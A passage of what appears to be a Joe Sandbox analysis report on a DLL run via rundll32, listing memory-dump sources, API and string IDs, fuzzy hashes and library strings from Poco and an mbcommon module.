      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Event$ObjectSingleWaitstd::bad_exception::bad_exception
      • String ID: cannot unlock reader/writer lock
      • API String ID: 3180635873-371100150
      • Opcode ID: 8c42cc83d1dc5662322d6a4df776fd4029acb352a784f7d713df5e6f3d36fb27
      • Instruction ID: d7938ff99a365b3d87c448e0d198d97c5280b858174ccc0be31b4ddeb6fe8eec
      • Opcode Fuzzy Hash: 8c42cc83d1dc5662322d6a4df776fd4029acb352a784f7d713df5e6f3d36fb27
      • Instruction Fuzzy Hash: 53017172210A0D92EB92DF34D8943D92361F798BA8F508221A69D471B6DF38CB4DC740
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: AddressHandleModuleProc
      • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
      • API String ID: 1646373207-4044117955
      • Opcode ID: 89e552c4e88594f4528d331deacfdfd5774308e9a2a5faa3174df9f7c776611f
      • Instruction ID: 82d929f7dce70f2d4cc30c438cf3b185241df2672d86fdfca1400b9e468a4217
      • Opcode Fuzzy Hash: 89e552c4e88594f4528d331deacfdfd5774308e9a2a5faa3174df9f7c776611f
      • Instruction Fuzzy Hash: A8D0E274610E09D0EB868B11E8983D86322AB1DBA0F858021891906231AE78C78EC300
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID:
      • API String ID: 1156100317-0
      • Opcode ID: 4c0fcecc25532a6bca2445fc70d44c848c979418bf5aad8969812cd20ace7fdb
      • Instruction ID: bf21a2e4e3eed7cd890d8279d15e8f828ffcafd917cef997570f9cfaa1a5c951
      • Opcode Fuzzy Hash: 4c0fcecc25532a6bca2445fc70d44c848c979418bf5aad8969812cd20ace7fdb
      • Instruction Fuzzy Hash: 7481F732204A8C89F6F78B74A4583EAA790AB5D7B4F06C711FE56265A4DF3CC7898700
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _set_statfp
      • String ID:
      • API String ID: 1156100317-0
      • Opcode ID: 875aa39bdbfff885f1eaa1d50411e9c2b76fb06a4bc3d51bafdc59c774b2410f
      • Instruction ID: 12bd030bb14459057d4e795199f88650652e390fad2f0e14d604fef560c65bce
      • Opcode Fuzzy Hash: 875aa39bdbfff885f1eaa1d50411e9c2b76fb06a4bc3d51bafdc59c774b2410f
      • Instruction Fuzzy Hash: 6B11A932A14A0D09F7E61168F84F3E653426B5C370F1BC63CEA764A2DA8F1CCB494318
      APIs
      • FlsGetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD0F
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD2E
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD56
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD67
      • FlsSetValue.KERNEL32(?,?,?,0000000180115D4F,?,?,00000000,0000000180115FEA,?,?,?,?,8000000000000000,0000000180115F76), ref: 000000018012AD78
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Value
      • String ID:
      • API String ID: 3702945584-0
      • Opcode ID: 81d1270b762b0c3052a7883345d0481c278e379d47ca9de34ba82a4d0e7734ec
      • Instruction ID: 5395f719372555535939784c7be95c2335b10427f043919dc8125f3aba7b9476
      • Opcode Fuzzy Hash: 81d1270b762b0c3052a7883345d0481c278e379d47ca9de34ba82a4d0e7734ec
      • Instruction Fuzzy Hash: D41166B070060C42FADBD7A5699D3E963825B4C7F1F84C724A93A46BD6ED28D6094300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: NULL$UNKNOWN
      • API String ID: 3668304517-1702702805
      • Opcode ID: 5a53d26a1a5bbb904569064fe1efa1fe02fcc7a8f52a4aaa2ae3858da6874c8a
      • Instruction ID: 72e003983931457cbed81e393341778105e41611213a4bd58213932db65429f8
      • Opcode Fuzzy Hash: 5a53d26a1a5bbb904569064fe1efa1fe02fcc7a8f52a4aaa2ae3858da6874c8a
      • Instruction Fuzzy Hash: 52E1DBB2700A4886EB45DF65D4843DE73A2F389BD8F408112EE5C47BA9DF78C699C780
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: CountLocalTickTime_invalid_parameter_noinfo_noreturn
      • String ID: NULL
      • API String ID: 2617042107-324932091
      • Opcode ID: a28921490d57aeb845739df719c729e3a787046ccc08f6e18cbdcb93d3b3afc5
      • Instruction ID: 0302fca370165518a614849ae6957893dbb9724cfd82eb150d4bd385d77409e6
      • Opcode Fuzzy Hash: a28921490d57aeb845739df719c729e3a787046ccc08f6e18cbdcb93d3b3afc5
      • Instruction Fuzzy Hash: DF819272618B8885D751DF66A4443AAB7A1F7C9BE0F508215FED843B99DF7CC189CB00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: \\?\
      • API String ID: 3668304517-4282027825
      • Opcode ID: 7474011f91476d4f1f395424f9e6538de8aded65c8bbec649ce6fef0c6d9fbb7
      • Instruction ID: e3da2e98e83031a46e163e82dd4a2df939d91234efc63fa8098c881fd51fdd5e
      • Opcode Fuzzy Hash: 7474011f91476d4f1f395424f9e6538de8aded65c8bbec649ce6fef0c6d9fbb7
      • Instruction Fuzzy Hash: 5571B172F10B8895FB42DBB4D4053EC2362A7997E8F40D712AE5C26ADADE74D299C340
      APIs
      Strings
      • mb::common::system::DynamicLibrary::GetFunctionAddress, xrefs: 0000000180008016
      • D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp, xrefs: 000000018000800F
      • Could not load '%s' function ptr from DLL, %s, xrefs: 0000000180007FF0
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$AddressProc
      • String ID: Could not load '%s' function ptr from DLL, %s$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp$mb::common::system::DynamicLibrary::GetFunctionAddress
      • API String ID: 1230731272-4139386056
      • Opcode ID: b34e889fd022bbeee9e1fa76f47b9e9ad2bafbb3a5cc8b6230be30ab7d054667
      • Instruction ID: 8f446e428537b61bb469f5dc6ffa7d697688d599811667f0c1dc1d600c907061
      • Opcode Fuzzy Hash: b34e889fd022bbeee9e1fa76f47b9e9ad2bafbb3a5cc8b6230be30ab7d054667
      • Instruction Fuzzy Hash: EF617C72B11B8495EB91CB69D4543ED33A1FB487E8F40D611EEAC17AA9DF39C689C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Lockitstd::_$GetctypeLockit::_Lockit::~_
      • String ID: bad locale name
      • API String ID: 4031452535-1405518554
      • Opcode ID: 478bf454d2c5dc8698a69319a5ae243412ac62571b83a77d00aeeb4afc9df37b
      • Instruction ID: e46e7240f11e8861bd97b3fc796cf63e4a9d5239baa8a6bc634fefc30cdde4d8
      • Opcode Fuzzy Hash: 478bf454d2c5dc8698a69319a5ae243412ac62571b83a77d00aeeb4afc9df37b
      • Instruction Fuzzy Hash: A751AD32705B888AFB92DB70D4903ED33B0FB48798F448125EE8927A56DF34C25AD740
      APIs
      Strings
      • D:\Jenkins\workspace\N_Poco-VS2022\poco-1.12.4\Foundation\src\UUID.cpp, xrefs: 00000001800053D3
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
      • String ID: D:\Jenkins\workspace\N_Poco-VS2022\poco-1.12.4\Foundation\src\UUID.cpp
      • API String ID: 3936042273-2945662684
      • Opcode ID: 5e185dececa9ffba5f991f3b2136fd39395a2c4a35c5d19d9c8cad2849e43297
      • Instruction ID: 184b889ee7b8437c24e17c986fc0991f08bc74d679e07afdf23ead7db32f2553
      • Opcode Fuzzy Hash: 5e185dececa9ffba5f991f3b2136fd39395a2c4a35c5d19d9c8cad2849e43297
      • Instruction Fuzzy Hash: 6B41F77270174C85FA56DB25A4043ED3291970DBEAF648720EEAD077D2EF79C6D98340
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventObjectResetSingleWaitstd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2155282129-3465051855
      • Opcode ID: 04afe7aeb50be484474440e41a6ba2e6a53ef334bd5f62e7df4d7ad6249427b5
      • Instruction ID: 957882a243363fd6d7becb3249b184c5a90b221fcb011ca086b4eca50b7a50e4
      • Opcode Fuzzy Hash: 04afe7aeb50be484474440e41a6ba2e6a53ef334bd5f62e7df4d7ad6249427b5
      • Instruction Fuzzy Hash: F001447221094DD1EB92DF24E8947D96372F798B98F508111EA5D475B6DE2CCB4DC700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: EventObjectSingleWaitstd::bad_exception::bad_exception
      • String ID: cannot lock reader/writer lock
      • API String ID: 2550396280-3465051855
      • Opcode ID: 8668b01ef895fa9c907ac601cdbf758bfc3ef4e0a08812f0761a6ab266ec204c
      • Instruction ID: 81ac2efecde3d820960b4444860f485e3e67599f3676025276b3880028ebf80e
      • Opcode Fuzzy Hash: 8668b01ef895fa9c907ac601cdbf758bfc3ef4e0a08812f0761a6ab266ec204c
      • Instruction Fuzzy Hash: BE01867221494D92EFA2DF34E8543D92361F79CBA8F508211AA5D461E5DF78CB4DC700
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: b2c45699f4e96eed30ae793f53bffa8189e6b1516e1df3511c241bc08676e161
      • Instruction ID: d3ca66fb5dc8ef5d60f2ba4e6a04f48cd7171f11350cc8f66b5cc806ebf3fdaf
      • Opcode Fuzzy Hash: b2c45699f4e96eed30ae793f53bffa8189e6b1516e1df3511c241bc08676e161
      • Instruction Fuzzy Hash: B7B181B2311A8881EF85CF25D4983ED3366F749FD8F548122EA9D0BB99DF79C5998300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: ActionsShim
      • API String ID: 3668304517-3444104735
      • Opcode ID: 15ef7686102915452db76d5188d50b71f09ce339104a48d757c6c0837b23a0f3
      • Instruction ID: 3e157ecc3d4080ae9d86b064c881996505c3036df48e40823568e20f45b0052f
      • Opcode Fuzzy Hash: 15ef7686102915452db76d5188d50b71f09ce339104a48d757c6c0837b23a0f3
      • Instruction Fuzzy Hash: DE916B32210B8482EB85DF25E48439D73A5F789B94F54C125EB9D07BA9DF38C599D340
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmpDownload File
